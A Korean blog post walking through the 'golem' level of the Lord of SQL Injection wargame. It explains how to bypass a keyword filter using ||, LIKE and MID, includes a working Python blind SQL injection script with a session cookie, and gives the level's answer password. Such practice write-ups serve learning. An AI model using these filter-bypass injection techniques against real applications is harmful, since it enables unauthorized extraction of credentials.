이 영역을 누르면 첫 페이지로 이동
DevDori 블로그의 첫 페이지로 이동

DevDori

페이지 맨 위로 올라가기

DevDori

[Lord of SQL Injection] golem 11번 풀이

  • 2021.10.17 15:47
  • WarGame/Lord of SQL Injection

[ 문제 접근 ]

11번 문제 ( golem )

1. if(preg_match('/or|and|substr\(|=/i', $_GET[pw])) exit("HeHe"); : or,and,substr,= 문자열을 필터링함

2. if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; : id가 존재하면 Hello를 띄워줌

3. if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("golem"); :

질의결과의 pw가 우리가 입력한 pw와 같을 경우 solve 시켜줌 => blindsqlinjection 사용해야 함을 유추 가능

=>방법 : or, and를 우회, 기존에 substr대신에 한글자씩 비교할 수 있는 함수를 사용

=> = 대신 다른 방식으로 비교하는 방법을 찾자! 

 

*힌트 : like, MID

 

https://devdori.tistory.com/24 : or, and 우회방법

 

[Lord of SQL Injection] darkelf 6번 풀이

[ 문제접근 ] if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 1. 이번 문제에서는 위의 조건을 통해 문자 and 또는 or라는 문자가 들어갔을때 필터링을 하고 HeHe를 출력 2. if($result['id'] == 'ad..

devdori.tistory.com

https://devdori.tistory.com/36: 문자열 자르는 방법

 

[MySQL]문자열 자르기 함수 (LEFT, MID, RIGHT, SUBSTR, SUBSTRING)

설명 MySQL에서 문자열의 일부분을 가져오는 방식으로 3가지가 존재한다. 1. LEFT : 문자열의 왼쪽을 기준으로 지정한 갯수 만큼 문자열을 가져오는 함수 2. MID, RIGHT, SUBSTR : 문자열의 시작지점을 지

devdori.tistory.com

 

 

[ 문제풀이 ]

더보기

<정답> : ?pw=77d6290b

<풀이>

이번 문제에서는 기존의 blindsqlinjection코드에서

or => || , = => like , substr => MID 로 바꾸면 풀 수 있었다.

 

import requests

url = 'https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php'
cookies = {'PHPSESSID':'uoaqqo49al5a3l6baodafl6edv'}
pw = ""
for i in range(1,9):
    for j in range(48,123):
        req = f"{url}?pw=' || ascii(MID(pw,{i},1)) like '{j}"
        res = requests.get(req,cookies=cookies)
        print(chr(j))
        if res.text.find("<h2>Hello admin</h2><code>") != -1:
            print(f"====={chr(j)}=====")
            pw+=chr(j)
            break
print(f"====(pw : {pw})====")

 

"GOLEM Clear!" 가 나타났다! 정답!

이제 다음 스테이지로 넘어가도록 하자

 

'WarGame > Lord of SQL Injection' 카테고리의 다른 글

[Lord of SQL Injection] bugbear 13번 풀이  (0) 2021.10.17
[Lord of SQL Injection] darkknight 12번 풀이  (0) 2021.10.17
[Lord of SQL Injection] skeleton 10번 풀이  (0) 2021.10.17
[Lord of SQL Injection] vampire 9번 풀이  (0) 2021.10.17
[Lord of SQL Injection] troll 8번 풀이  (0) 2021.10.13

댓글

이 글 공유하기

  • 구독하기

    구독하기

  • 카카오톡

    카카오톡

  • 라인

    라인

  • 트위터

    트위터

  • Facebook

    Facebook

  • 카카오스토리

    카카오스토리

  • 밴드

    밴드

  • 네이버 블로그

    네이버 블로그

  • Pocket

    Pocket

  • Evernote

    Evernote

다른 글

  • [Lord of SQL Injection] bugbear 13번 풀이

    [Lord of SQL Injection] bugbear 13번 풀이

    2021.10.17
  • [Lord of SQL Injection] darkknight 12번 풀이

    [Lord of SQL Injection] darkknight 12번 풀이

    2021.10.17
  • [Lord of SQL Injection] skeleton 10번 풀이

    [Lord of SQL Injection] skeleton 10번 풀이

    2021.10.17
  • [Lord of SQL Injection] vampire 9번 풀이

    [Lord of SQL Injection] vampire 9번 풀이

    2021.10.17
다른 글 더 둘러보기

정보

DevDori 블로그의 첫 페이지로 이동

DevDori


ShinhanBank InfoSec Devision
Sunrin High School InfoSec 115th
TeamH4C members

  • DevDori의 첫 페이지로 이동

나의 외부 링크

  • GitHub
  • FB
  • Instagram

검색

카테고리

  • 분류 전체보기 (43)
    • Project (7)
      • 정보보안 프로젝트 (6)
      • 진로 IT 프로젝트 (1)
    • System (4)
    • Reversing (3)
    • Web (1)
    • WarGame (21)
      • Lord of SQL Injection (15)
      • BandIt (2)
      • Webhacking.kr (0)
      • pwnable.kr (0)
      • HackCTF (2)
      • FTZ (0)
      • Dreamhack (2)
    • Dev (5)
      • DataBase (5)
    • Etc. (2)
      • 알쓸컴잡 (0)
      • Linux (1)
      • GitHub (1)
      • 시놀로지 (0)
    • Algorithm (0)
      • programmers (0)

메뉴

  • 홈
  • 태그
  • 방명록

최근 글

인기 글

댓글

정보

DevDori의 DevDori

DevDori

DevDori

블로그 구독하기

  • 구독하기
  • RSS 피드

방문자

  • 전체 방문자
  • 오늘
  • 어제

티스토리

  • 티스토리 홈
  • 이 블로그 관리하기
  • 글쓰기
Powered by Tistory / Kakao. Copyright © DevDori.

티스토리툴바